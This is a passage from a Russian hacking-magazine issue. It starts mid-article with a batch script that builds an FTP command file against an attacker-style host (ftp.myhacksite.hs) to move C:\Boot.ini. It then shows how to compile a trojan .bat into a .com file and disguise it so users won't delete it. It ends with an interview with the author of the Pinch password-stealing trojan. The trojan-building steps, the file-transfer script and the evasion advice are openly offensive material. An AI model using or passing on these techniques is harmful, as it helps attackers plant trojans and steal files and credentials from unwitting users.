Одиссея программиста

Hi-Tech

Спецвыпуск: Хакер, номер #048, стр. 048-054-5

echo open ftp.myhacksite.hs:21 > main-get.scn

echo user admin> > main-get.scn

echo admin> > main-get.scn

rem Текстовые файлы надо заливать в ASCII mode, поэтому тип не указываем, так как он задан, как уже говорилось, по дефолту.

rem Тут ничего не меняется. Теперь, предположим, у нас нет доступа на запись в главную директорию, но ты можешь писать в incoming. Поэтому перейдем в эту директорию.

cd incoming> > main-get.scn

rem А теперь загружаем файл C:\Boot.ini. Далее делаем все по стандартному сценарию.

echo get c:\Boot.ini> > main-get.scn

echo bye> > main-get.scn

ftp -s:main-get.scn –nd

Отдельное внимание стоит уделить "компилированию" батника. Ты удивляешься, что это возможно? В сети существует множество программ, позволяющих превратить текстовый файл сценария, написанный на языке BATCH, в com-файл. Ярким примером такой программы является bat2exec. Работа с ней банально проста: bat2exe.com trojan.bat trojan.com. После этой нехитрой операции появится файл trojan.com. Для красоты можно можешь переименовать .com в .exe: смотрится гораздо лучше и привычнее. Правда, юзер скорее удалит exe файл, чем com. Пользователи, которые фанатеют от MS-DOS или, наоборот, вообще не знают, что это такое, считают com-файлы системными и боятся их удалять.

XS: Как возникла идея написания такого трояна, как pinch?

C: Изначально pinch задумывался для улучшения навыков программинга на асме, и не было и речи о его распространении, продаже и т.д. Но результат превзошел все ожидания, прежде всего своим размером и возможностями. Это был один из первых троев (да и сейчас таких по пальцам пересчитать), который вместо паролей слал хеши, а внешняя программа их декриптила и оформляла отчет.

XS: Как ты думаешь, почему pinch остается одним из наиболее популярных троянов?

C: Pinch является бесплатным, доступным и простым в использовании, содержит множество функций при минимальном размере сервера.

XS: Почему в отличие от других разработчиков подобного софта ты все-таки выложил его исходники?

C: Это своего рода пропаганда Ассемблера среди разработчиков, ведь этот язык является далеко не таким сложным, как принято считать в массах. Книг по асму под Винду практически не существует, и исходники могут послужить базой, толчком в мир Ассемблера.

XS: Что посоветуешь начинающему программисту?

C: Любая программа (не обязательно троян) должна нести в себе новизну, то, что ее выделит среди множества других. Меня убивают скрипткидисы, которые полностью слизывают чей-то проект либо собирают все модули своего трояна из исходников в инете. Я сам не пишу весь код с нуля: что-то нахожу в интернете, что-то достаю по обмену, но большая часть написана именно мной.

XS: Почему ты прекратил работу над дальнейшим усовершенствованием LD.Pinch?

C: Pinch изначально был написан криво, в нем много багов, это был один из первых проектов на асме. Вместо усовершенствования старой версии я вот уже около двух месяцев пишу Pinch-2.

XS: Какие проекты планируешь на будущее? Ходят слухи, что ты работаешь в ritlabs. Хотелось бы узнать, так ли это.